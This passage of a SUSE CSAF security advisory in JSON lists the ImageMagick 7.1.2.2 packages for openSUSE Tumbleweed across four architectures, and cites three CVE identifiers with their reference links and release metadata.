"text": "openSUSE-Tumbleweed-2025-15498",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15498-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55212 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55212/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-57803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-57803/"
}
],
"title": "ImageMagick-7.1.2.2-2.1 on GA media",
"tracking": {
"current_release_date": "2025-08-28T00:00:00Z",
"generator": {
"date": "2025-08-28T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15498-1",
"initial_release_date": "2025-08-28T00:00:00Z",
"revision_history": [
{
"date": "2025-08-28T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.2-2.1.aarch64",
"product": {
"name": "ImageMagick-7.1.2.2-2.1.aarch64",
"product_id": "ImageMagick-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.2-2.1.aarch64",
"product": {
"name": "ImageMagick-devel-7.1.2.2-2.1.aarch64",
"product_id": "ImageMagick-devel-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"product_id": "ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.2-2.1.aarch64",
"product": {
"name": "ImageMagick-doc-7.1.2.2-2.1.aarch64",
"product_id": "ImageMagick-doc-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.2-2.1.aarch64",
"product": {
"name": "ImageMagick-extra-7.1.2.2-2.1.aarch64",
"product_id": "ImageMagick-extra-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagick++-devel-7.1.2.2-2.1.aarch64",
"product_id": "libMagick++-devel-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"product_id": "libMagick++-devel-32bit-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.2-2.1.aarch64",
"product": {
"name": "perl-PerlMagick-7.1.2.2-2.1.aarch64",
"product_id": "perl-PerlMagick-7.1.2.2-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.2-2.1.ppc64le",
"product": {
"name": "ImageMagick-7.1.2.2-2.1.ppc64le",
"product_id": "ImageMagick-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"product": {
"name": "ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"product_id": "ImageMagick-devel-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"product_id": "ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"product": {
"name": "ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"product_id": "ImageMagick-doc-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"product": {
"name": "ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"product_id": "ImageMagick-extra-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagick++-devel-7.1.2.2-2.1.ppc64le",
"product_id": "libMagick++-devel-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"product_id": "libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"product": {
"name": "perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"product_id": "perl-PerlMagick-7.1.2.2-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.2-2.1.s390x",
"product": {
"name": "ImageMagick-7.1.2.2-2.1.s390x",
"product_id": "ImageMagick-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.2-2.1.s390x",
"product": {
"name": "ImageMagick-devel-7.1.2.2-2.1.s390x",
"product_id": "ImageMagick-devel-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"product_id": "ImageMagick-devel-32bit-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.2-2.1.s390x",
"product": {
"name": "ImageMagick-doc-7.1.2.2-2.1.s390x",
"product_id": "ImageMagick-doc-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.2-2.1.s390x",
"product": {
"name": "ImageMagick-extra-7.1.2.2-2.1.s390x",
"product_id": "ImageMagick-extra-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagick++-devel-7.1.2.2-2.1.s390x",
"product_id": "libMagick++-devel-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"product_id": "libMagick++-devel-32bit-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.2-2.1.s390x",
"product": {
"name": "perl-PerlMagick-7.1.2.2-2.1.s390x",
"product_id": "perl-PerlMagick-7.1.2.2-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.2-2.1.x86_64",
"product": {
"name": "ImageMagick-7.1.2.2-2.1.x86_64",
"product_id": "ImageMagick-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.2-2.1.x86_64",
"product": {
"name": "ImageMagick-devel-7.1.2.2-2.1.x86_64",
"product_id": "ImageMagick-devel-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"product_id": "ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.2-2.1.x86_64",
"product": {
"name": "ImageMagick-doc-7.1.2.2-2.1.x86_64",
"product_id": "ImageMagick-doc-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.2-2.1.x86_64",
"product": {
"name": "ImageMagick-extra-7.1.2.2-2.1.x86_64",
"product_id": "ImageMagick-extra-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagick++-devel-7.1.2.2-2.1.x86_64",
"product_id": "libMagick++-devel-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"product_id": "libMagick++-devel-32bit-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.2-2.1.x86_64",
"product": {
"name": "perl-PerlMagick-7.1.2.2-2.1.x86_64",
"product_id": "perl-PerlMagick-7.1.2.2-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64"
},
"product_reference": "ImageMagick-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le"
},
"product_reference": "ImageMagick-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x"
},
"product_reference": "ImageMagick-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64"
},
"product_reference": "ImageMagick-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x"
},
"product_reference": "ImageMagick-devel-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64"
},
"product_reference": "ImageMagick-doc-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le"
},
"product_reference": "ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x"
},
"product_reference": "ImageMagick-doc-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64"
},
"product_reference": "ImageMagick-doc-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64"
},
"product_reference": "ImageMagick-extra-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le"
},
"product_reference": "ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x"
},
"product_reference": "ImageMagick-extra-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64"
},
"product_reference": "ImageMagick-extra-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
